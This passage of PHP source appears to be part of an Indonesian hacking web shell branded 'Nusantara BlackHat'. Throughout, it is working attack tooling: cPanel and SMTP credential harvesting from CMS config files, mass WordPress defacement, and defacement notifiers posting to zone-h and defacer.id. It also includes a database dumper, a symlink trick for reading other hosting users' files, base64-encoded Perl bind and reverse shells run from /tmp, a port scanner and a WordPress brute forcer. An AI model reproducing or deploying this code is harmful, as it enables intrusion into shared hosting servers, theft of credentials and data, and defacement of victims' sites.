  1032.                             $i++;
  1033.                             if(function_exists('posix_getpwuid')) {
  1034.                                 $domain_cp = file_get_contents("/etc/named.conf"); 
  1035.                                 if($domain_cp == '') {
  1036.                                     $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
  1037.                                 } else {
  1038.                                     preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1039.                                     foreach($domains_cp[1] as $dj) {
  1040.                                         $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1041.                                         $user_cp_url = $user_cp_url['name'];
  1042.                                         if($user_cp_url == $ucp) {
  1043.                                             $dom = "<a href='http://$dj/' target='_blank'><font color=blue>$dj</font></a>";
  1044.                                             break;
  1045.                                         }
  1046.                                     }
  1047.                                 }
  1048.                             } else {
  1049.                                 $dom = "<font color=red>function is Disable by system</font>";
  1050.                             }
  1051.                             echo "username (<font color=blue>$ucp</font>) password (<font color=blue>$pcp</font>) domain ($dom)<br>";
  1052.                         }
  1053.                     }
  1054.                 }
  1055.             }
  1056.         }
  1057.         if($i == 0) {
  1058.         } else {
  1059.             echo "<br>sukses nyolong ".$i." Cpanel by <font color=blue>Nusantara_BlackHat</font>";
  1060.         }
  1061.     } else {
  1062.         echo "<center>
  1063.         <form method='post'>
  1064.         USER: <br>
  1065.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1066.         $_usercp = fopen("/etc/passwd","r");
  1067.         while($getu = fgets($_usercp)) {
  1068.             if($getu == '' || !$_usercp) {
  1069.                 echo "<font color=red>Can't read /etc/passwd</font>";
  1070.             } else {
  1071.                 preg_match_all("/(.*?):x:/", $getu, $u);
  1072.                 foreach($u[1] as $user_cp) {
  1073.                         if(is_dir("/home/$user_cp/public_html")) {
  1074.                             echo "$user_cpn";
  1075.                     }
  1076.                 }
  1077.             }
  1078.         }
  1079.         echo "</textarea><br>
  1080.         PASS: <br>
  1081.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1082.         function cp_pass($dir) {
  1083.             $pass = "";
  1084.             $dira = scandir($dir);
  1085.             foreach($dira as $dirb) {
  1086.                 if(!is_file("$dir/$dirb")) continue;
  1087.                 $ambil = file_get_contents("$dir/$dirb");
  1088.                 if(preg_match("/WordPress/", $ambil)) {
  1089.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."n";
  1090.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1091.                     $pass .= ambilkata($ambil,"password = '","'")."n";
  1092.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1093.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."n";
  1094.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1095.                     $pass .= ambilkata($ambil,'password = "','"')."n";
  1096.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1097.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."n";
  1098.                 } elseif(preg_match("/client/", $ambil)) {
  1099.                     preg_match("/password=(.*)/", $ambil, $pass1);
  1100.                     $pass .= $pass1[1]."n";
  1101.                     if(preg_match('/"/', $pass1[1])) {
  1102.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  1103.                         $pass .= $pass1[1]."n";
  1104.                     }
  1105.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1106.                     $pass .= ambilkata($ambil,"db_password = '","'")."n";
  1107.                 }
  1108.             }
  1109.             echo $pass;
  1110.         }
  1111.         $cp_pass = cp_pass($dir);
  1112.         echo $cp_pass;
  1113.         echo "</textarea><br>
  1114.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  1115.         </form>
  1116.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1117.     }
  1118. } elseif($_GET['do'] == 'smtp') {
  1119.     echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  1120.     function scj($dir) {
  1121.         $dira = scandir($dir);
  1122.         foreach($dira as $dirb) {
  1123.             if(!is_file("$dir/$dirb")) continue;
  1124.             $ambil = file_get_contents("$dir/$dirb");
  1125.             $ambil = str_replace("$", "", $ambil);
  1126.             if(preg_match("/JConfig|joomla/", $ambil)) {
  1127.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
  1128.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  1129.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  1130.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  1131.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
  1132.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  1133.                 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  1134.                 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  1135.                 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  1136.                 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  1137.                 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  1138.                 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  1139.             }
  1140.         }
  1141.     }
  1142.     $smpt_hunter = scj($dir);
  1143.     echo $smpt_hunter;
  1144. } elseif($_GET['do'] == 'auto_wp') {
  1145.     if($_POST['hajar']) {
  1146.         $title = htmlspecialchars($_POST['new_title']);
  1147.         $pn_title = str_replace(" ", "-", $title);
  1148.         if($_POST['cek_edit'] == "Y") {
  1149.             $script = $_POST['edit_content'];
  1150.         } else {
  1151.             $script = $title;
  1152.         }
  1153.         $conf = $_POST['config_dir'];
  1154.         $scan_conf = scandir($conf);
  1155.         foreach($scan_conf as $file_conf) {
  1156.             if(!is_file("$conf/$file_conf")) continue;
  1157.             $config = file_get_contents("$conf/$file_conf");
  1158.             if(preg_match("/WordPress/", $config)) {
  1159.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  1160.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  1161.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1162.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  1163.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1164.                 $prefix = $dbprefix."posts";
  1165.                 $option = $dbprefix."options";
  1166.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1167.                 $db = mysql_select_db($dbname);
  1168.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  1169.                 $result = mysql_fetch_array($q);
  1170.                 $id = $result[ID];
  1171.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1172.                 $result2 = mysql_fetch_array($q2);
  1173.                 $target = $result2[option_value];
  1174.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  1175.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  1176.                 echo "<div style='margin: 5px auto;'>";
  1177.                 if($target == '') {
  1178.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  1179.                 } else {
  1180.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  1181.                 }
  1182.                 if(!$update OR !$conn OR !$db) {
  1183.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  1184.                 } else {
  1185.                     echo "<font color=lime>sukses di ganti.</font><br>";
  1186.                 }
  1187.                 echo "</div>";
  1188.                 mysql_close($conn);
  1189.             }
  1190.         }
  1191.     } else {
  1192.         echo "<center>
  1193.        <h1>Auto Edit Title+Content WordPress</h1>
  1194.        <form method='post'>
  1195.        DIR Config: <br>
  1196.        <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1197.        Set Title: <br>
  1198.        <input type='text' name='new_title' value='Hacked by Nusantara BlackHat' placeholder='New Title'><br><br>
  1199.        Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  1200.        <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  1201.        <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  1202.        <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  1203.        </form>
  1204.        <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1205.        ";
  1206.     }
  1207. } elseif($_GET['do'] == 'zoneh') {
  1208.     if($_POST['submit']) {
  1209.         $domain = explode("\r\n", $_POST['url']);
  1210.         $nick =  $_POST['nick'];
  1211.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1212.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  1213.         function zoneh($url,$nick) {
  1214.             $ch = curl_init("http://www.zone-h.com/notify/single");
  1215.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1216.                   curl_setopt($ch, CURLOPT_POST, true);
  1217.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1218.             return curl_exec($ch);
  1219.                   curl_close($ch);
  1220.         }
  1221.         foreach($domain as $url) {
  1222.             $zoneh = zoneh($url,$nick);
  1223.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1224.                 echo "$url -> <font color=lime>OK</font><br>";
  1225.             } else {
  1226.                 echo "$url -> <font color=red>ERROR</font><br>";
  1227.             }
  1228.         }
  1229.     } else {
  1230.         echo "<center><form method='post'>
  1231.        <u>Defacer</u>: <br>
  1232.        <input type='text' name='nick' size='50' value='Your Nick'><br>
  1233.        <u>Domains</u>: <br>
  1234.        <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1235.        <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  1236.        </form>";
  1237.     }
  1238.     echo "</center>";
  1239. }elseif($_GET['do'] == 'defacerid') {
  1240. echo "<center><form method='POST' action=''>
  1241. <br>
  1242. <h1>Defacer ID Notify </h1>
  1243. <br>
  1244. Attacker : <br><input type='text' name='nick' placeholder='Hekel'><br>
  1245. Team : <br><input type='text' name='team' placeholder='Team'><br>
  1246. Sites : <br><textarea name='sites' placeholder='http://nekopoi.site' style='width: 450px; height: 150px;'></textarea><br>
  1247. <input type='submit' name='sikat' value='Submit!!'>
  1248. </form>";
  1249.  
  1250.  
  1251. error_reporting(0);
  1252. $nick = $_POST['nick'];
  1253. $team = $_POST['team'];
  1254. $sikat = $_POST['sikat'];
  1255. $url = explode("\r\n", $_POST['sites']);
  1256. if($sikat){
  1257. echo "Notify with nick [ ".$nick." ] and With Team [ ".$team." ] <p>";
  1258. function defid($url,$nick,$team) {
  1259. $ch = curl_init("https://defacer.id/archives/notify");
  1260. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1261. curl_setopt($ch, CURLOPT_POST, true);
  1262. curl_setopt($ch, CURLOPT_POSTFIELDS, "attacker=$nick&team=$team&poc=SQL Injection&url=$url");
  1263. return curl_exec($ch);
  1264. curl_close($ch);
  1265. }
  1266. foreach($url as $url) {
  1267. $defid = defid($url,$nick,$team);
  1268. if(preg_match('#<div class="success-box">#', $defid)) {
  1269. echo "<font color='lime' size='3'>Ok -></font>".$url."<p>";
  1270. } else {
  1271. echo "<font color='red' size='3'>Error -></font> ".$url."<p>";
  1272.     }
  1273. }
  1274. }
  1275. }
  1276. /////////////////
  1277. elseif($_GET['do'] == 'dbdump')
  1278.     {
  1279. echo $head.'<p align="center">';
  1280. echo '
  1281. <center><form action method=post>
  1282. <table width=371 class=tabnet >
  1283. <tr><th colspan="2">Database Dump</th></tr>
  1284. <tr>
  1285.     <td>Server </td>
  1286.     <td><input class="inputz" type=text name=server size=52></td></tr><tr>
  1287.     <td>Username</td>
  1288.     <td><input class="inputz" type=text name=username size=52></td></tr><tr>
  1289.     <td>Password</td>
  1290.     <td><input class="inputz" type=text name=password size=52></td></tr><tr>
  1291.     <td>DataBase Name</td>
  1292.     <td><input class="inputz" type=text name=dbname size=52></td></tr>
  1293.     <tr>
  1294.     <td>DB Type </td>
  1295.     <td><form method=post action="'.$me.'">
  1296.     <select class="inputz" name=method>
  1297.         <option  value="gzip">Gzip</option>
  1298.         <option value="sql">Sql</option>
  1299.         </select>
  1300.     <input class="inputzbut" type=submit value="  Dump!  " ></td></tr>
  1301.     </form></center></table></center>';
  1302. if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
  1303. $date = date("Y-m-d");
  1304. $dbserver = $_POST['server'];
  1305. $dbuser = $_POST['username'];
  1306. $dbpass = $_POST['password'];
  1307. $dbname = $_POST['dbname'];
  1308. $file = "Dump-$dbname-$date";
  1309. $method = $_POST['method'];
  1310. if ($method=='sql'){
  1311. $file="Dump-$dbname-$date.sql";
  1312. $fp=fopen($file,"w");
  1313. }else{
  1314. $file="Dump-$dbname-$date.sql.gz";
  1315. $fp = gzopen($file,"w");
  1316. }
  1317. function write($data) {
  1318. global $fp;
  1319. if ($_POST['method']=='ssql'){
  1320. fwrite($fp,$data);
  1321. }else{
  1322. gzwrite($fp, $data);
  1323. }}
  1324. mysql_connect ($dbserver, $dbuser, $dbpass);
  1325. mysql_select_db($dbname);
  1326. $tables = mysql_query ("SHOW TABLES");
  1327. while ($i = mysql_fetch_array($tables)) {
  1328.     $i = $i['Tables_in_'.$dbname];
  1329.     $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
  1330.     write($create['Create Table'].";nn");
  1331.     $sql = mysql_query ("SELECT * FROM ".$i);
  1332.     if (mysql_num_rows($sql)) {
  1333.         while ($row = mysql_fetch_row($sql)) {
  1334.             foreach ($row as $j => $k) {
  1335.                 $row[$j] = "'".mysql_escape_string($k)."'";
  1336.             }
  1337.             write("INSERT INTO $i VALUES(".implode(",", $row).");n");
  1338.         }
  1339.     }
  1340. }
  1341. if ($method=='ssql'){
  1342. fclose ($fp);
  1343. }else{
  1344. gzclose($fp);}
  1345. header("Content-Disposition: attachment; filename=" . $file);  
  1346. header("Content-Type: application/download");
  1347. header("Content-Length: " . filesize($file));
  1348. flush();
  1349.  
  1350. $fp = fopen($file, "r");
  1351. while (!feof($fp))
  1352. {
  1353.     echo fread($fp, 65536);
  1354.     flush();
  1355. }
  1356. fclose($fp);
  1357. }
  1358.  
  1359. }
  1360.  
  1361. ///////////////////////////////////
  1362. elseif($_GET['do'] == 'symlink') {
  1363. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1364. $d0mains = @file("/etc/named.conf");
  1365. ##httaces
  1366. if($d0mains){
  1367. @mkdir("nb_sym",0777);
  1368. @chdir("nb_sym");
  1369. @exe("ln -s / root");
  1370. $file3 = 'Options Indexes FollowSymLinks
  1371. DirectoryIndex n45ht.htm
  1372. AddType text/plain .php
  1373. AddHandler text/plain .php
  1374. Satisfy Any';
  1375. $fp3 = fopen('.htaccess','w');
  1376. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1377. echo "
  1378. <table align=center border=1 style='width:70%;border-color:#333333;'>
  1379. <tr>
  1380. <td align=center>-<font size=3>-S. No.-</font></td>
  1381. <td align=center>-<font size=3>-Domains-</font></td>
  1382. <td align=center>-<font size=3>-Users-</font></td>
  1383. <td align=center>-<font size=3>-Symlink-</font></td>
  1384. </tr>";
  1385. $dcount = 1;
  1386. foreach($d0mains as $d0main){
  1387. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1388. flush();
  1389. if(strlen(trim($domains[1][0])) > 2){
  1390. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  1391. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  1392. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  1393. <td>".$user['name']."</td>
  1394. <td><a href='$full/nb_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  1395. flush();
  1396. $dcount++;}}}
  1397. echo "</table>";
  1398. }else{
  1399. $TEST=@file('/etc/passwd');
  1400. if ($TEST){
  1401. @mkdir("nb_sym",0777);
  1402. @chdir("nb_sym");
  1403. exe("ln -s / root");
  1404. $file3 = 'Options Indexes FollowSymLinks
  1405. DirectoryIndex n45ht.htm
  1406. AddType text/plain .php
  1407. AddHandler text/plain .php
  1408. Satisfy Any';
  1409.  $fp3 = fopen('.htaccess','w');
  1410.  $fw3 = fwrite($fp3,$file3);
  1411.  @fclose($fp3);
  1412.  echo "
  1413. <table align=center border=1><tr>
  1414. <td align=center><font size=3>-S. No.-</font></td>
  1415. <td align=center><font size=3>-Users-</font></td>
  1416. <td align=center><font size=3>-Symlink-</font></td></tr>";
  1417.  $dcount = 1;
  1418.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  1419.  while(!feof($file)){
  1420.  $s = fgets($file);
  1421.  $matches = array();
  1422.  $t = preg_match('//(.*?)://s', $s, $matches);
  1423.  $matches = str_replace("home/","",$matches[1]);
  1424.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1425.  continue;
  1426.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1427. <td align=center><font class=txt>" . $matches . "</td>";
  1428.  echo "<td align=center><font class=txt><a href=$full/nb_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1429.  $dcount++;}fclose($file);
  1430.  echo "</table>";}else{if($os != "Windows"){@mkdir("nb_sym",0777);@chdir("nb_sym");@exe("ln -s / root");$file3 = '
  1431. Options Indexes FollowSymLinks
  1432. DirectoryIndex n45ht.htm
  1433. AddType text/plain .php
  1434. AddHandler text/plain .php
  1435. Satisfy Any
  1436. ';
  1437.  $fp3 = fopen('.htaccess','w');
  1438.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1439.  echo "
  1440. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  1441. <table align=center border=1><tr>
  1442. <td align=center><font size=3>ID</font></td>
  1443. <td align=center><font size=3>Users</font></td>
  1444. <td align=center><font size=3>Symlink</font></td></tr>";
  1445.  $temp = "";$val1 = 0;$val2 = 1000;
  1446.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  1447.  if ($uid)$temp .= join(':',$uid)."n";}
  1448.  echo '<br/>';$temp = trim($temp);$file5 =
  1449.  fopen("test.txt","w");
  1450.  fputs($file5,$temp);
  1451.  fclose($file5);$dcount = 1;$file =
  1452.  fopen("test.txt", "r") or exit("Unable to open file!");
  1453.  while(!feof($file)){$s = fgets($file);$matches = array();
  1454.  $t = preg_match('//(.*?)://s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  1455.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1456.  continue;
  1457.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1458. <td align=center><font class=txt>" . $matches . "</td>";
  1459.  echo "<td align=center><font class=txt><a href=$full/nb_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1460.  $dcount++;}
  1461.  fclose($file);
  1462.  echo "</table></div></center>";unlink("test.txt");
  1463.  } else
  1464.  echo "<center><font size=3>Cannot create Symlink</font></center>";
  1465.  }
  1466.  }
  1467. }
  1468. ////////////////////
  1469.  elseif($_GET['do'] == 'backconnect') {
  1470.     echo "<form method='post'>
  1471.     <u>Bind Port:</u> <br>
  1472.     PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  1473.     <input type='submit' name='sub_bp' value='>>'>
  1474.     </form>
  1475.     <form method='post'>
  1476.     <u>Back Connect:</u> <br>
  1477.     Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  1478.     PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  1479.     <input type='submit' name='sub_bc' value='>>'>
  1480.     </form>";
  1481.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  1482.     if(isset($_POST['sub_bp'])) {
  1483.         $f_bp = fopen("/tmp/bp.pl", "w");
  1484.         fwrite($f_bp, base64_decode($bind_port_p));
  1485.         fclose($f_bp);
  1486.  
  1487.         $port = $_POST['port_bind'];
  1488.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  1489.         sleep(1);
  1490.         echo "<pre>".$out."n".exe("ps aux | grep bp.pl")."</pre>";
  1491.         unlink("/tmp/bp.pl");
  1492.     }
  1493.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  1494.     if(isset($_POST['sub_bc'])) {
  1495.         $f_bc = fopen("/tmp/bc.pl", "w");
  1496.         fwrite($f_bc, base64_decode($bind_connect_p));
  1497.         fclose($f_bc);
  1498.  
  1499.         $ipbc = $_POST['ip_bc'];
  1500.         $port = $_POST['port_bc'];
  1501.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  1502.         sleep(1);
  1503.         echo "<pre>".$out."n".exe("ps aux | grep bc.pl")."</pre>";
  1504.         unlink("/tmp/bc.pl");
  1505.     }
  1506. } elseif($_GET['do'] == 'kill') {
  1507.     if(@unlink(preg_replace('!(d+)s.*!', '', __FILE__)))
  1508.             die('<center><br><center><h2>Shell removed</h2><br>Goodbye , Thanks for take my shell today</center></center>');
  1509.         else
  1510.             echo '<center>unlink failed!</center>';
  1511. } elseif($_GET['do'] == 'domains'){echo "<center><div class='mybox'><p align='center' class='cgx2'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
  1512. }elseif($_GET['do'] == 'ports') {
  1513.     echo '<table><tr><th><center><u>Port Scanner</u></tr></th></center><td>';
  1514.     echo '<div class="content">';
  1515.     echo '<form action="" method="post">';
  1516.    
  1517.     if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
  1518.         $start = strip_tags($_POST['start']);
  1519.         $end = strip_tags($_POST['end']);
  1520.         $host = strip_tags($_POST['host']);
  1521.         for($i = $start; $i<=$end; $i++){
  1522.             $fp = @fsockopen($host, $i, $errno, $errstr, 3);
  1523.             if($fp){
  1524.                 echo 'Port '.$i.' is <font color=green>open</font><br>';
  1525.             }
  1526.             flush();
  1527.         }
  1528.     } else {
  1529.         echo '<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">
  1530.              <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
  1531.              <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  1532.              Host: <input type="text" name="host" value="localhost"/><br /><br />
  1533.              Port start: <input type="text" name="start" value="0"/><br /><br />
  1534.              Port end:<input type="text" name="end" value="5000"/><br /><br />
  1535.              <input type="submit" value="Scan Ports" />
  1536.              </form></center><br /><br />';
  1537.     echo '</div></table></td>';
  1538.  
  1539. }
  1540. }
  1541.   /////////////////////////////
  1542.   elseif($_GET['do'] == 'wpbf') {
  1543.  
  1544. echo "<title>Wp-Brute Force</title>";
  1545.  
  1546. include("../head.php");
  1547.  
  1548.  
  1549.  
  1550. set_time_limit(0);
  1551. error_reporting(0);
  1552.  
  1553. class lugi{
  1554.  
  1555.         private $host;
  1556.         private $user;
  1557.         private $open;
  1558.         private $lista;
  1559.  
  1560.   public function banner() {
  1561.    echo("    <html>
  1562.    <head>
  1563.    <style type='text/css'>
  1564.    
  1565. textarea {
  1566.         width: 100%;
  1567.     height: 400px;
  1568. }
  1569.  
  1570.  
  1571.    .ext{
  1572.        color: blue;
  1573.    }
  1574.  
  1575.    .area{
  1576.        width:400px;
  1577.        height:350px;
  1578.        resize:none;
  1579.    }
  1580.  
  1581.    </style>
  1582.    </head>
  1583.    <body>
  1584.    <h1><center>WordPress Brute Force</center></h1>
  1585.    <form action='' method='POST'>
  1586.    <center>Host:<input type='text' name='host' class='con7' placeholder='http://tager.com/' size='40' > </center><br>
  1587.    <center>User:<input type='text' name='user' class='con7' value='admin' size='25'>    </center><br>
  1588.    <center>Wordlist</center>
  1589.    <center><textarea class='form-control con7' rows='10' name='lista'></textarea><br><br><center>
  1590.    <center><input type='Submit' class='kntd' value='Start'></center>
  1591.    </form>
  1592.    </body>
  1593.   </html>");
  1594.  
  1595. }
  1596.  
  1597.     public function extract_post() {
  1598.          $this->host = $_POST["host"];
  1599.          $this->user = $_POST["user"];
  1600.          $this->open = $_POST["lista"];
  1601.        }
  1602.  
  1603.        public function Xregex() {
  1604.          if(preg_match("@/wp-login.php@", $this->host)) {
  1605.              return true;
  1606.          } else {
  1607.             $this->host = $_POST["host"]."/wp-login.php";
  1608.          }
  1609.      }
  1610.  
  1611.       public function brute() {
  1612.            $lista = array_filter(explode("\n", $this->open));
  1613.            foreach($lista as $this->lista) {
  1614.            for($i=0; $i < count($this->lista); $i++) {
  1615.                         $this->Xcurl();
  1616.                      }
  1617.               }
  1618.        }
  1619.  
  1620.         private function cool() {
  1621.             echo "[+] Host:"."<font color='white'>{$this->host}</font>";
  1622.             echo " <br/>[+] User:"."<font color='white'>{$this->user}</font>";
  1623.             echo " <br/>[+] Pass:"."<font color='white'>{$this->lista}</font>";
  1624.         }
  1625.  
  1626.         private function Xcurl() {
  1627.             $curl = curl_init();
  1628.             curl_setopt($curl, CURLOPT_URL, $this->host);
  1629.             curl_setopt($curl, CURLOPT_USERAGENT, $this->useragent);
  1630.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  1631.             curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
  1632.             curl_setopt($curl, CURLOPT_POST, true);
